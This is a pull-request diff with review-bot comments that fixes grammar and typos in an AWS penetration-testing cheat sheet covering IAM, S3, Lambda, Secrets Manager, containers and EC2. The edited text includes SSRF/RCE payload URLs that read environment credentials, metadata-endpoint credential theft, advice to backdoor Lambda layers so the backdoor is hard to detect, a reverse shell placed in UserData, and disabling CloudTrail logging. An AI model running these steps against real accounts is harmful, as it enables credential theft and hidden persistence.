Merge pull request #1 from ShubhamJagtap2000/ShubhamJagtap2000-update-docs
Update AWS Pentest.md
pull/2/head
commit
1d5f4ccb45
|
@ -795,10 +795,10 @@ arn:aws:iam:100:user/admin
|
||||||
* It's assumed that we have gain access to the AWS Credentials
|
* It's assumed that we have gain access to the AWS Credentials
|
||||||
* We can see if we have permissions using [Amazon's policy simulator](**[https://policysim.aws.amazon.com/](https://policysim.aws.amazon.com/)**)
|
* We can see if we have permissions using [Amazon's policy simulator](**[https://policysim.aws.amazon.com/](https://policysim.aws.amazon.com/)**)
|
||||||
* Always look for policies and roles with the * symbol.
|
* Always look for policies and roles with the * symbol.
|
||||||
* See which user do not have MFA enabled
|
* See which user do not have MFA enabled
|
||||||
* User enumeration in IAM Panel and group enumeration
|
* User enumeration in IAM Panel and group enumeration
|
||||||
* We can also enumerate roles from the same interface
|
* We can also enumerate roles from the same interface
|
||||||
* Root user is super admin
|
* Root user is super admin
|
||||||
|
|
||||||
## Configure AWS cli
|
## Configure AWS cli
|
||||||
|
|
||||||
|
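Review bot: the policy simulator link in this hunk is a malformed nested markdown link, `[Amazon's policy simulator](**[https://policysim.aws.amazon.com/](https://policysim.aws.amazon.com/)**)`; it should be one link, `[Amazon's policy simulator](https://policysim.aws.amazon.com/)`. Two grammar slips are also left on both sides: "we have gain access" should read "we have gained access", and "See which user do not have MFA enabled" should be "See which users do not have MFA enabled".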
@ -840,7 +840,7 @@ aws iam list-users
|
||||||
aws iam list-groups-for-user --user-name user-name
|
aws iam list-groups-for-user --user-name user-name
|
||||||
```
|
```
|
||||||
|
|
||||||
### Listing all manages policies that are attached to the specified IAM user
|
### Listing all managed policies that are attached to the specified IAM user
|
||||||
|
|
||||||
```
|
```
|
||||||
aws iam list-attached-user-policies --user-name user-name
|
aws iam list-attached-user-policies --user-name user-name
|
||||||
|
@ -872,7 +872,7 @@ aws iam list-attached-group-policies --group-name group-name
|
||||||
aws iam list-group-policies --group-name group name
|
aws iam list-group-policies --group-name group name
|
||||||
```
|
```
|
||||||
|
|
||||||
## 3. Enumeratig Roles
|
## 3. Enumerating Roles
|
||||||
|
|
||||||
### Listing IAM Roles
|
### Listing IAM Roles
|
||||||
|
|
||||||
|
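Review bot: the placeholder in `aws iam list-group-policies --group-name group name` is left unchanged although it is split by a space, so a reader who copies it passes `name` as a stray extra argument; use `group-name`, matching the `--group-name group-name` form in the hunk header line above.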
@ -880,7 +880,7 @@ aws iam list-group-policies --group-name group name
|
||||||
aws iam list-roles
|
aws iam list-roles
|
||||||
```
|
```
|
||||||
|
|
||||||
### Listsing all managed policies that are attached to the specified IAM role
|
### Listing all managed policies that are attached to the specified IAM role
|
||||||
|
|
||||||
```
|
```
|
||||||
aws iam list-attached-role-policies --role-name role-name
|
aws iam list-attached-role-policies --role-name role-name
|
||||||
|
@ -972,13 +972,13 @@ https://account-id-here.signin.aws.amazon.com/console
|
||||||
aws sts get-caller-identity
|
aws sts get-caller-identity
|
||||||
```
|
```
|
||||||
|
|
||||||
2. Listing policies attached to an user
|
2. Listing policies attached to a user
|
||||||
|
|
||||||
```
|
```
|
||||||
aws iam list-attached-user-policies --user-name example_name -- profile example_profile
|
aws iam list-attached-user-policies --user-name example_name -- profile example_profile
|
||||||
```
|
```
|
||||||
|
|
||||||
3. Retrieving informations about an specific policy
|
3. Retrieving information about a specific policy
|
||||||
|
|
||||||
```
|
```
|
||||||
aws iam get-policy --policy-arn policy_arn
|
aws iam get-policy --policy-arn policy_arn
|
||||||
|
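Review bot: both sides of this hunk keep `-- profile example_profile` in the `list-attached-user-policies` line; with the space, `--` ends option parsing and `profile` becomes a stray positional argument. The flag is `--profile example_profile`, the form already used in the `aws sts get-caller-identity --profile example_profile` header of a later hunk.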
@ -996,7 +996,7 @@ Now we can finally retrieve the contents of the policy
|
||||||
aws iam get-policy-version --policy-arn example_arn --version-id id_example
|
aws iam get-policy-version --policy-arn example_arn --version-id id_example
|
||||||
```
|
```
|
||||||
|
|
||||||
*It's important to use the command above to chech the information about the default policy*
|
*It's important to use the command above to check the information about the default policy*
|
||||||
|
|
||||||
4. Escalation
|
4. Escalation
|
||||||
|
|
||||||
|
@ -1082,13 +1082,13 @@ aws sts get-caller-identity --profile example_profile
|
||||||
#### Accessing more credentials
|
#### Accessing more credentials
|
||||||
* It's possible to assume other roles with the sts:AssumeRole permission (Example: An user doesn't have access to an s3 instance, but it has this permission, we can easily assume other roles if we are in the trust relashionship, increasing our access in the instance)
|
* It's possible to assume other roles with the sts:AssumeRole permission (Example: An user doesn't have access to an s3 instance, but it has this permission, we can easily assume other roles if we are in the trust relashionship, increasing our access in the instance)
|
||||||
|
|
||||||
##### Listing managed policies attached to an user
|
##### Listing managed policies attached to a user
|
||||||
|
|
||||||
```
|
```
|
||||||
aws iam list-attached-user-policies --user-name example_name
|
aws iam list-attached-user-policies --user-name example_name
|
||||||
```
|
```
|
||||||
|
|
||||||
##### Retrieving information about an specific policy
|
##### Retrieving information about a specific policy
|
||||||
|
|
||||||
```
|
```
|
||||||
aws iam get-policy --policy-arn ARN
|
aws iam get-policy --policy-arn ARN
|
||||||
|
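Review bot: the bullet under "Accessing more credentials" keeps "trust relashionship" and "An user" on both sides, while the same typo is corrected in the "Listing trust relationship between role and user" heading later in this PR; fix it here too ("trust relationship", "A user"). "an s3 instance" is also odd wording, since S3 has buckets rather than instances.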
@ -1100,7 +1100,7 @@ aws iam get-policy --policy-arn ARN
|
||||||
aws iam list-policy-versions --policy-arn ARN
|
aws iam list-policy-versions --policy-arn ARN
|
||||||
```
|
```
|
||||||
|
|
||||||
##### Retrieving information about an specific version
|
##### Retrieving information about a specific version
|
||||||
|
|
||||||
```
|
```
|
||||||
aws iam get-policy-version --policy-arn policy_arn --version-id ID
|
aws iam get-policy-version --policy-arn policy_arn --version-id ID
|
||||||
|
@ -1112,7 +1112,7 @@ aws iam get-policy-version --policy-arn policy_arn --version-id ID
|
||||||
aws iam list-roles
|
aws iam list-roles
|
||||||
```
|
```
|
||||||
|
|
||||||
##### Listing trust relashionship between role and user (Which roles we can assume)
|
##### Listing trust relationship between role and user (Which roles we can assume)
|
||||||
|
|
||||||
```
|
```
|
||||||
aws iam get-role --role-name role_name
|
aws iam get-role --role-name role_name
|
||||||
|
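Review bot: the renamed heading "Listing trust relationship between role and user (Which roles we can assume)" would be more actionable with one line saying where to look in the output: `aws iam get-role` returns the trust policy in the `AssumeRolePolicyDocument` field, and its `Principal` element lists which identities are allowed to assume the role.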
@ -1152,12 +1152,12 @@ aws sts get-caller-identity
|
||||||
|
|
||||||
## S3 - Simple Storage System
|
## S3 - Simple Storage System
|
||||||
|
|
||||||
* Storage system that allow users to store and retrieve data.
|
* Storage system that allows users to store and retrieve data.
|
||||||
* List,Get,Put and Delete operations can be performed on the objects of the bucket
|
* List,Get,Put and Delete operations can be performed on the objects of the bucket
|
||||||
* Buckets are global, meaning that they are available to all regions
|
* Buckets are global, meaning that they are available to all regions
|
||||||
* It's possible to bruteforce the bucket name and region in the URL
|
* It's possible to bruteforce the bucket name and region in the URL
|
||||||
* Its possible to apply ACL's to bucket and object level and bucket policies for bucket level
|
* Its possible to apply ACL's to bucket and object level and bucket policies for bucket level
|
||||||
* There is also time limited URL's and identity based policies
|
* There is also time limited URL's and identity-based policies
|
||||||
* Identity policies are enumerated using IAM commands
|
* Identity policies are enumerated using IAM commands
|
||||||
|
|
||||||
## Enumeration
|
## Enumeration
|
||||||
|
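Review bot: the S3 bullets are only partly cleaned up. `Its possible to apply ACL's` keeps the missing apostrophe and the plural "ACL's" (should be "It's possible to apply ACLs"), and `List,Get,Put and Delete` still lacks spaces after the commas. "Buckets are global, meaning that they are available to all regions" is also imprecise: bucket names are globally unique, but each bucket is created in, and stored in, one region.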
@ -1192,7 +1192,7 @@ aws s3api get-public-access-block --bucket name
|
||||||
aws s3api list-objects --bucket name
|
aws s3api list-objects --bucket name
|
||||||
```
|
```
|
||||||
|
|
||||||
### Getting ACL information about specific object
|
### Getting ACL information about a specific object
|
||||||
|
|
||||||
```
|
```
|
||||||
aws s3api get-object-acl --bucket-name name --key object_name
|
aws s3api get-object-acl --bucket-name name --key object_name
|
||||||
|
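Review bot: `aws s3api get-object-acl --bucket-name name --key object_name` is left unchanged, but `get-object-acl` takes `--bucket`, not `--bucket-name` (compare `get-public-access-block --bucket name` and `list-objects --bucket name` in this same hunk); as written the command fails with an unknown-argument error.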
@ -1218,7 +1218,7 @@ aws s3api get-object --bucket name --key object-name download-file-location
|
||||||
|
|
||||||
### Time-Based Url
|
### Time-Based Url
|
||||||
|
|
||||||
* Generate a time based url for an object
|
* Generate a time-based url for an object
|
||||||
* Userful if the object is not public
|
* Userful if the object is not public
|
||||||
|
|
||||||
```
|
```
|
||||||
|
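Review bot: "Userful if the object is not public" keeps the "Userful" typo on both sides (it recurs in an ECS bullet and in the "Userful Commands" heading later in this PR); it should read "Useful".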
@ -1226,7 +1226,7 @@ aws s3 presign s3://bucket-name/object-name --expires-in 605000
|
||||||
```
|
```
|
||||||
|
|
||||||
## Lambda & API Gateway
|
## Lambda & API Gateway
|
||||||
* Serverless event driven platform
|
* Serverless event-driven platform
|
||||||
* Runs code in response to events and automatically manages computing resources required by that code
|
* Runs code in response to events and automatically manages computing resources required by that code
|
||||||
* Can trigger from other AWS services or call directly from the API Gateway
|
* Can trigger from other AWS services or call directly from the API Gateway
|
||||||
* A lambda function is a piece of code that is executed whenever is triggered by an event from an event source
|
* A lambda function is a piece of code that is executed whenever is triggered by an event from an event source
|
||||||
|
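Review bot: the presign example in the hunk header uses `--expires-in 605000`, which is above the 604800-second (7-day) maximum the AWS CLI accepts for `aws s3 presign`; a value at or below that, or the 3600-second default, would be a correct example. It is also worth a sentence that a presigned URL carries the signing identity's access to that object until it expires, so generated URLs should be handled like credentials.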
@ -1257,7 +1257,7 @@ aws lambda get-function --function-name function_name
|
||||||
aws lambda get-policy --function-name function_name
|
aws lambda get-policy --function-name function_name
|
||||||
```
|
```
|
||||||
|
|
||||||
* We can get informations like who can execute this functions, ID and other informations with this command
|
* We can get information like who can execute this functions, ID and other information with this command
|
||||||
|
|
||||||
### Listing the event source mapping information about a lambda function
|
### Listing the event source mapping information about a lambda function
|
||||||
|
|
||||||
|
@ -1335,15 +1335,15 @@ aws apigateway get-api-key --api-key KEY
|
||||||
|
|
||||||
## Initial Access
|
## Initial Access
|
||||||
|
|
||||||
* Its possible to get RCE through API Gateway if it executes commands.
|
* It's possible to get RCE through API Gateway if it executes commands.
|
||||||
* If you can execute commands, there is a way to retrieve keys from the API Gateway, just use `env` , configure `aws cli` and proceed with the exploitation.
|
* If you can execute commands, there is a way to retrieve keys from the API Gateway, just use `env`, configure `aws cli` and proceed with the exploitation.
|
||||||
|
|
||||||
## Credential Access
|
## Credential Access
|
||||||
|
|
||||||
Getting credentials from Lambda can be done in 2 ways
|
Getting credentials from Lambda can be done in 2 ways
|
||||||
|
|
||||||
1. Keys in the source code
|
1. Keys in the source code
|
||||||
2. Keys in the enviroment variables
|
2. Keys in the environment variables
|
||||||
|
|
||||||
These keys can be gathered using SSRF, RCE and so on.
|
These keys can be gathered using SSRF, RCE and so on.
|
||||||
|
|
||||||
|
@ -1365,7 +1365,7 @@ https://apigateway/prod/example?url=http://localhost:9001/2018-06-01/runtime/inv
|
||||||
https://apigateway/prod/system?cmd=file:///proc/self/environ
|
https://apigateway/prod/system?cmd=file:///proc/self/environ
|
||||||
```
|
```
|
||||||
|
|
||||||
### Getting credentials from lambda enviroment variables (cli)
|
### Getting credentials from lambda environment variables (cli)
|
||||||
|
|
||||||
```
|
```
|
||||||
aws lambda get-function --function-name NAME
|
aws lambda get-function --function-name NAME
|
||||||
|
@ -1374,8 +1374,8 @@ aws lambda get-function --function-name NAME
|
||||||
* It's important to enumerate the functions first with `aws lambda list-functions`
|
* It's important to enumerate the functions first with `aws lambda list-functions`
|
||||||
|
|
||||||
## Persistence
|
## Persistence
|
||||||
* If the user has sufficient rights in the lambda function, its possible to download the source code, add a backdoor to it and upload. Everytime the lambda executes, the malicious code will also execute.
|
* If the user has sufficient rights in the lambda function, it's possible to download the source code, add a backdoor to it and upload. Every time the lambda executes, the malicious code will also execute.
|
||||||
* Always try to update the code of layers (depedencies) instead of the actual lambda code, this way our backdoor will be difficult to detect.
|
* Always try to update the code of layers (dependencies) instead of the actual lambda code, this way our backdoor will be difficult to detect.
|
||||||
|
|
||||||
### Checking which user is executing
|
### Checking which user is executing
|
||||||
|
|
||||||
|
@ -1525,8 +1525,8 @@ aws iam list-attached-user-policies --user-name user_name
|
||||||
|
|
||||||
## AWS Secret Manager
|
## AWS Secret Manager
|
||||||
|
|
||||||
* AWS Service that encrypts and store secrets
|
* AWS Service that encrypts and stores secrets
|
||||||
* Transparently decrypts and return in plaintext
|
* Transparently decrypts and returns in plaintext
|
||||||
* KMS used to store keys (AWS Key and Customer Managed Key)
|
* KMS used to store keys (AWS Key and Customer Managed Key)
|
||||||
* Asymmetric and Symmetric keys can be created using KMS
|
* Asymmetric and Symmetric keys can be created using KMS
|
||||||
|
|
||||||
|
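Review bot: the "AWS Secret Manager" heading is kept on both sides, but the service is named AWS Secrets Manager, matching the `secretsmanager` CLI namespace used further down in this PR. The bullet "KMS used to store keys (AWS Key and Customer Managed Key)" could also be sharpened: AWS managed keys and customer managed keys are KMS key types, and Secrets Manager encrypts each secret value with one of them rather than storing keys itself.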
@ -1581,13 +1581,13 @@ aws kms get-key-policy --policy-name name --key-id ID
|
||||||
|
|
||||||
* If the user has access to Secret Manager, it can decrypt the secrets using the web, cli or API
|
* If the user has access to Secret Manager, it can decrypt the secrets using the web, cli or API
|
||||||
|
|
||||||
### Listing policies attached to an user
|
### Listing policies attached to a user
|
||||||
|
|
||||||
```
|
```
|
||||||
aws iam list-attached-user-policies --user-name name
|
aws iam list-attached-user-policies --user-name name
|
||||||
```
|
```
|
||||||
|
|
||||||
### Retrieving information about a specific version of policy
|
### Retrieving information about a specific version of the policy
|
||||||
|
|
||||||
* Here we can see the permissions
|
* Here we can see the permissions
|
||||||
|
|
||||||
|
@ -1595,7 +1595,7 @@ aws iam list-attached-user-policies --user-name name
|
||||||
aws iam get-policy-version --policy-arn arn --version-id id
|
aws iam get-policy-version --policy-arn arn --version-id id
|
||||||
```
|
```
|
||||||
|
|
||||||
### Listing all secrets stored by Secret Manager
|
### Listing all secrets stored by the Secret Manager
|
||||||
|
|
||||||
```
|
```
|
||||||
aws secretsmanager list-secrets
|
aws secretsmanager list-secrets
|
||||||
|
@ -1603,13 +1603,13 @@ aws secretsmanager list-secrets
|
||||||
|
|
||||||
### Listing information about a specific secret
|
### Listing information about a specific secret
|
||||||
|
|
||||||
* Here we get the secret Key Id to descript the secret
|
* Here we get the secret Key Id to describe the secret
|
||||||
|
|
||||||
```
|
```
|
||||||
aws secretsmanager describe-secret --secret-id name
|
aws secretsmanager describe-secret --secret-id name
|
||||||
```
|
```
|
||||||
|
|
||||||
### Getting resource-based policy attached to an specific secret
|
### Getting resource-based policy attached to a specific secret
|
||||||
|
|
||||||
```
|
```
|
||||||
aws secretsmanager get-resource-policy --secret-id ID
|
aws secretsmanager get-resource-policy --secret-id ID
|
||||||
|
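Review bot: the rewording "Here we get the secret Key Id to describe the secret" probably changes the intended meaning. The original "descript" reads as a typo for "decrypt": `describe-secret` returns the `KmsKeyId` of the key used to encrypt the secret value (when a customer managed key is configured), so the bullet is about decryption. Suggest "Here we get the KMS key ID used to decrypt the secret".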
@ -1627,13 +1627,13 @@ aws secretsmanager get-secret-value --secret-id ID
|
||||||
|
|
||||||
* If we compromised as an example an S3 with an encrypted file, we can decrypt it using the keys stored in KMS.
|
* If we compromised as an example an S3 with an encrypted file, we can decrypt it using the keys stored in KMS.
|
||||||
|
|
||||||
#### Listing an specific key
|
#### Listing a specific key
|
||||||
|
|
||||||
```
|
```
|
||||||
aws kms describe-key --key-id id
|
aws kms describe-key --key-id id
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Listing policies attached to an specified key
|
#### Listing policies attached to a specified key
|
||||||
|
|
||||||
* Here we can see who can access the key, the description of it and so on
|
* Here we can see who can access the key, the description of it and so on
|
||||||
|
|
||||||
|
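Review bot: "If we compromised as an example an S3 with an encrypted file" is left as is and is hard to parse; suggest "If, for example, we have access to an S3 bucket containing a KMS-encrypted file, we can decrypt it with the key stored in KMS". The "Listing a specific key" heading also slightly misdescribes `describe-key`, which returns metadata for one key; "Describing a specific key" fits better.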
@ -1651,7 +1651,7 @@ aws kms get-key-policy --policy-name name --key-id ID
|
||||||
|
|
||||||
#### Decrypt the secret using the key
|
#### Decrypt the secret using the key
|
||||||
|
|
||||||
* There is no need to specificy the key information because this information is embbeded in the encrypted file
|
* There is no need to specify the key information because this information is embedded in the encrypted file
|
||||||
|
|
||||||
```
|
```
|
||||||
aws kms decrypt --ciphertext-blob fileb://EncryptedFile --output text --query plaintext
|
aws kms decrypt --ciphertext-blob fileb://EncryptedFile --output text --query plaintext
|
||||||
|
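Review bot: `aws kms decrypt ... --query plaintext` is kept unchanged but prints `None`: the response field is `Plaintext`, and JMESPath expressions are case sensitive. The value is also base64-encoded, so the line needs `--query Plaintext` plus a base64 decode step to yield the file contents. The bullet above it is right that the key identity is embedded in the ciphertext for symmetric KMS keys; that does not hold for asymmetric keys, where `--key-id` (and the encryption algorithm) must be supplied.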
@ -1662,14 +1662,14 @@ aws kms decrypt --ciphertext-blob fileb://EncryptedFile --output text --query pl
|
||||||
Divided into three categories
|
Divided into three categories
|
||||||
|
|
||||||
* Registry -> Secure place to store container images (ECR)
|
* Registry -> Secure place to store container images (ECR)
|
||||||
* Orchestration -> Configure when and where the containters run (ECS,EKS)
|
* Orchestration -> Configure when and where the containers run (ECS, EKS)
|
||||||
* Compute -> Use to do computing related tasks (EC2, Fargate)
|
* Compute -> Use to do computing-related tasks (EC2, Fargate)
|
||||||
* Its possible to create a backdoor image and add to a EKS cluster
|
* Is it possible to create a backdoor image and add to a EKS cluster
|
||||||
* Always look how VPC's are communicatig with each other, maybe is possible to pivot through the EKS VPC from other VPC and compromise the entire cluster
|
* Always look how VPC's are communicating with each other, maybe is possible to pivot through the EKS VPC from other VPC and compromise the entire cluster
|
||||||
|
|
||||||
## Initial Access
|
## Initial Access
|
||||||
|
|
||||||
* The initial access can be done by exploiting some RCE in webapp to get access to the container, afterwards its possible to compromise the EC2.
|
* The initial access can be done by exploiting some RCE in web app to get access to the container, afterwards it's possible to compromise the EC2.
|
||||||
|
|
||||||
After the RCE, we can list all secrets in EKS
|
After the RCE, we can list all secrets in EKS
|
||||||
|
|
||||||
|
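Review bot: the edit "Its possible to create a backdoor image" -> "Is it possible to create a backdoor image" turns the statement into a question and looks like a slip for the intended fix, "It's possible to create a backdoor image and add it to an EKS cluster". The next bullet is only partly fixed: "maybe is possible to pivot" should be "it may be possible to pivot", and "VPC's" should be "VPCs".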
@ -1721,19 +1721,19 @@ aws ecr describe-images --repository-name name --images-ids imageTag=name
|
||||||
aws ecs list-clusters
|
aws ecs list-clusters
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Listing information about an specific cluster
|
#### Listing information about a specific cluster
|
||||||
|
|
||||||
```
|
```
|
||||||
aws ecs describe-clusters --cluster name
|
aws ecs describe-clusters --cluster name
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Listing all services in specified cluster
|
#### Listing all services in a specified cluster
|
||||||
|
|
||||||
```
|
```
|
||||||
aws ecs list-services --cluster name
|
aws ecs list-services --cluster name
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Listing information about an specific service
|
#### Listing information about a specific service
|
||||||
|
|
||||||
```
|
```
|
||||||
aws ecs descibe-services --cluster name --services name
|
aws ecs descibe-services --cluster name --services name
|
||||||
|
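Review bot: `aws ecs descibe-services` is misspelled on both sides of the hunk and should be `aws ecs describe-services`. The hunk header line also shows `aws ecr describe-images --repository-name name --images-ids imageTag=name`; the ECR flag is `--image-ids`.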
@ -1741,13 +1741,13 @@ aws ecs descibe-services --cluster name --services name
|
||||||
|
|
||||||
* This command shows the logs of the service
|
* This command shows the logs of the service
|
||||||
|
|
||||||
#### Listing tasks in specific cluster
|
#### Listing tasks in a specific cluster
|
||||||
|
|
||||||
```
|
```
|
||||||
aws ecs list-tasks --cluster name
|
aws ecs list-tasks --cluster name
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Listing information about an specific task
|
#### Listing information about a specific task
|
||||||
|
|
||||||
```
|
```
|
||||||
aws ecs describe-tasks --cluster name -tasks taskArn
|
aws ecs describe-tasks --cluster name -tasks taskArn
|
||||||
|
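Review bot: `aws ecs describe-tasks --cluster name -tasks taskArn` has a single dash on `-tasks` on both sides; the flag is `--tasks`, and as written the CLI rejects the argument.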
@ -1755,7 +1755,7 @@ aws ecs describe-tasks --cluster name -tasks taskArn
|
||||||
|
|
||||||
* Also shows information about network, userful if trying to pivot
|
* Also shows information about network, userful if trying to pivot
|
||||||
|
|
||||||
#### Listing all containers in specified cluster
|
#### Listing all containers in a specified cluster
|
||||||
|
|
||||||
```
|
```
|
||||||
aws ecs list-container-instances --cluster name
|
aws ecs list-container-instances --cluster name
|
||||||
|
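Review bot: the ECS bullet keeps "userful"; it should be "useful". The heading "Listing all containers in a specified cluster" also mislabels the command: `list-container-instances` lists container instances (the EC2 hosts registered to the cluster), not the containers running on them; "Listing all container instances in a specified cluster" is accurate.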
@ -1769,13 +1769,13 @@ aws ecs list-container-instances --cluster name
|
||||||
aws eks list-clusters
|
aws eks list-clusters
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Listing information about an specific cluster
|
#### Listing information about a specific cluster
|
||||||
|
|
||||||
```
|
```
|
||||||
aws eks describe-cluster --name name
|
aws eks describe-cluster --name name
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Listing all node groups in specified cluster
|
#### Listing all node groups in a specified cluster
|
||||||
|
|
||||||
```
|
```
|
||||||
aws eks list-nodegroups --cluster-name name
|
aws eks list-nodegroups --cluster-name name
|
||||||
|
@ -1787,7 +1787,7 @@ aws eks list-nodegroups --cluster-name name
|
||||||
aws eks describe-nodegroup --cluster-name name --nodegroup-name name
|
aws eks describe-nodegroup --cluster-name name --nodegroup-name name
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Listing Fargate in specified cluster
|
#### Listing Fargate in a specified cluster
|
||||||
|
|
||||||
```
|
```
|
||||||
aws eks list-fargate-profiles --cluster-name cluster-name
|
aws eks list-fargate-profiles --cluster-name cluster-name
|
||||||
|
@ -1952,7 +1952,7 @@ X PUT "http://169.254.169.254/latest/ api /token" H "X-aws-ec2-metadata-token-tt
|
||||||
```
|
```
|
||||||
|
|
||||||
### Privilege Escalation
|
### Privilege Escalation
|
||||||
* One approach to get a shell in a instance is to put a reverse shell in UserData attribute, when the instance is launched, we will have the connection.
|
* One approach to get a shell in an instance is to put a reverse shell in UserData attribute, when the instance is launched, we will have the connection.
|
||||||
* Another approach happens when we have the iam:PassRole and iam:AmazonEC2FullAccess permissions, we can add an administrator role to the compromised EC2 instance and access aws services.
|
* Another approach happens when we have the iam:PassRole and iam:AmazonEC2FullAccess permissions, we can add an administrator role to the compromised EC2 instance and access aws services.
|
||||||
|
|
||||||
#### Getting information about the key
|
#### Getting information about the key
|
||||||
|
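Review bot: "iam:PassRole and iam:AmazonEC2FullAccess permissions" mixes an IAM action with a managed policy name: `iam:PassRole` is an action, while `AmazonEC2FullAccess` is an AWS managed policy, not an `iam:` permission. Suggest "iam:PassRole together with EC2 permissions such as those granted by the AmazonEC2FullAccess managed policy". The hunk header line also shows the IMDSv2 token request with its option dashes stripped (`X PUT`, `H`) and spaces inside the `/latest/api/token` path, so that block should be checked in the full file.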
@ -2014,7 +2014,7 @@ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_OF_PR
|
||||||
aws configure
|
aws configure
|
||||||
```
|
```
|
||||||
|
|
||||||
Or use enviroment variables.
|
Or use environment variables.
|
||||||
|
|
||||||
### Persistence
|
### Persistence
|
||||||
* All the persistence techniques works here, SSH persistence, vim backdoor and so on.
|
* All the persistence techniques works here, SSH persistence, vim backdoor and so on.
|
||||||
|
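Review bot: "All the persistence techniques works here" keeps a number-agreement error on both sides; it should read "work here".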
@ -2108,7 +2108,7 @@ After mounting, we will have access to the disk.
|
||||||
|
|
||||||
* Service to use, operate and scale relational databases in AWS (MariaDB, MySQL and similar)
|
* Service to use, operate and scale relational databases in AWS (MariaDB, MySQL and similar)
|
||||||
* The access is done by using password, password+IAM or password+kerberos
|
* The access is done by using password, password+IAM or password+kerberos
|
||||||
* It's possible to restrict access using restriction such as specific EC2 or lambda or use network level restriction such as vpc, ip.
|
* It's possible to restrict access using restrictions such as specific EC2 or lambda or use network-level restrictions such as vpc, ip.
|
||||||
* RDS Proxy hadles the traffic between the application and the database, it enables the enforcing of IAM permissions and use secrets manager to store credentials.
|
* RDS Proxy hadles the traffic between the application and the database, it enables the enforcing of IAM permissions and use secrets manager to store credentials.
|
||||||
|
|
||||||
## Enumeration
|
## Enumeration
|
||||||
|
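Review bot: the RDS Proxy bullet is unchanged and keeps "hadles" (should be "handles") and "use secrets manager" (should be "uses Secrets Manager"). In the fixed bullet above it, "restrict access using restrictions" is tautological and "vpc, ip" is terse; "It's possible to restrict access to specific EC2 instances or Lambda functions, or at the network level by VPC or IP address" says the same thing more clearly.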
@ -2161,7 +2161,7 @@ aws rds describe-db-instances
|
||||||
aws ec2 describe-security-groups --group-ids id
|
aws ec2 describe-security-groups --group-ids id
|
||||||
```
|
```
|
||||||
|
|
||||||
### Password based authentication
|
### Password-based authentication
|
||||||
|
|
||||||
```
|
```
|
||||||
mysql -h hostname -u name -P port -p password
|
mysql -h hostname -u name -P port -p password
|
||||||
|
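Review bot: `mysql -h hostname -u name -P port -p password` is kept unchanged, but the `mysql` client only accepts a password attached to `-p` (`-ppassword`) or via `--password=`; with a space, the client prompts for the password and treats `password` as the database name. The hunk header below already uses the `--password` form. Since a password on the command line also ends up in shell history and process listings, `-p` alone (prompting) is the better default for an example.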
@ -2209,16 +2209,16 @@ mysql -h hostname -u name -P port --enable-cleartext-plugin --user=user --passwo
|
||||||
|
|
||||||
## Single Sign On (SSO)
|
## Single Sign On (SSO)
|
||||||
|
|
||||||
* Used to centrally manage access to multiple AWS accounts and applications.
|
* Used to manage access to multiple AWS accounts and applications centrally.
|
||||||
* Provide users a way to interact with all services and applications through one place
|
* Provide users a way to interact with all services and applications through one place
|
||||||
* Can be used to manage access and user permissions to all AWS accounts
|
* Can be used to manage access and user permissions to all AWS accounts
|
||||||
* The identity source can use AWS SSO's identity store or external identity store (Okta,SAML and similar)
|
* The identity source can use AWS SSO's identity store or external identity store (Okta, SAML and similar)
|
||||||
|
|
||||||
## CloudTrail
|
## CloudTrail
|
||||||
|
|
||||||
* Log monitoring service, allow us to continuously monitor and retain account activity related to actions in our AWS account
|
* Log monitoring service, allows us to continuously monitor and retain account activity related to actions in our AWS account
|
||||||
* Provide event history of AWS account activity, SDKs, command line tools and other services
|
* Provide event history of AWS account activity, SDKs, command line tools and other services
|
||||||
* Commonly used to detect unsual behavior in AWS account
|
* Commonly used to detect unusual behavior in AWS account
|
||||||
* Pacu automatically changes the user agent to deceive the logs of cloudtrail
|
* Pacu automatically changes the user agent to deceive the logs of cloudtrail
|
||||||
|
|
||||||
### Userful Commands
|
### Userful Commands
|
||||||
|
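Review bot: the "Userful Commands" heading is left with the same "Userful" typo on both sides; it should be "Useful Commands". The bullet "Pacu automatically changes the user agent to deceive the logs of cloudtrail" would also help a defender more if it stated the consequence: the user-agent string in CloudTrail events is client-controlled and should not be relied on as a trust signal in detections.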
@ -2256,7 +2256,7 @@ aws cloudtrail update-trail --name example_trail --no-include-global-service-eve
|
||||||
|
|
||||||
* Used to protect applications against common web application attacks
|
* Used to protect applications against common web application attacks
|
||||||
* Common WAF bypasses can be tested against it
|
* Common WAF bypasses can be tested against it
|
||||||
* To detect an WAF, we can use `wafw00f`
|
* To detect a WAF, we can use `wafw00f`
|
||||||
|
|
||||||
## AWS Inspector
|
## AWS Inspector
|
||||||
|
|
||||||
|
@ -2271,12 +2271,12 @@ aws cloudtrail update-trail --name example_trail --no-include-global-service-eve
|
||||||
## Virtual Private Cloud
|
## Virtual Private Cloud
|
||||||
|
|
||||||
* Used to create an isolated infrastructure within the cloud, including subnets and so on.
|
* Used to create an isolated infrastructure within the cloud, including subnets and so on.
|
||||||
* If the VPC has an internet gateway, means its a public subnet
|
* If the VPC has an internet gateway, means it is a public subnet
|
||||||
* Every VPC can have Network ACL's
|
* Every VPC can have Network ACL's
|
||||||
|
|
||||||
## Routing Tables
|
## Routing Tables
|
||||||
|
|
||||||
A set of rules to determine where the traffic will be directed, comes in form of Destination and Target, defined as follows
|
A set of rules to determine where the traffic will be directed, comes in the form of Destination and Target, defined as follows
|
||||||
|
|
||||||
```
|
```
|
||||||
DESTINATION TARGET
|
DESTINATION TARGET
|
||||||
|
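Review bot: "If the VPC has an internet gateway, means it is a public subnet" is still ungrammatical after the edit and conflates the VPC with its subnets: a subnet is public when its route table has a route (typically `0.0.0.0/0`) to an internet gateway, and a VPC with an internet gateway can still contain private subnets. Suggest "A subnet whose route table routes to an internet gateway is a public subnet". "Network ACL's" should also be "Network ACLs".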
@ -2292,7 +2292,7 @@ IP eni -> Network Interface
|
||||||
|
|
||||||
* VPC Internal -> Internal IP, no internet connection
|
* VPC Internal -> Internal IP, no internet connection
|
||||||
* Internet Gateway -> Used to access the internet
|
* Internet Gateway -> Used to access the internet
|
||||||
* NAT Gateway -> Does the NAT between machines, allows one way connection to the internet
|
* NAT Gateway -> Does the NAT between machines, allows one-way connection to the internet
|
||||||
* VPC Peering -> Allows the communication between 2 VPC's
|
* VPC Peering -> Allows the communication between 2 VPC's
|
||||||
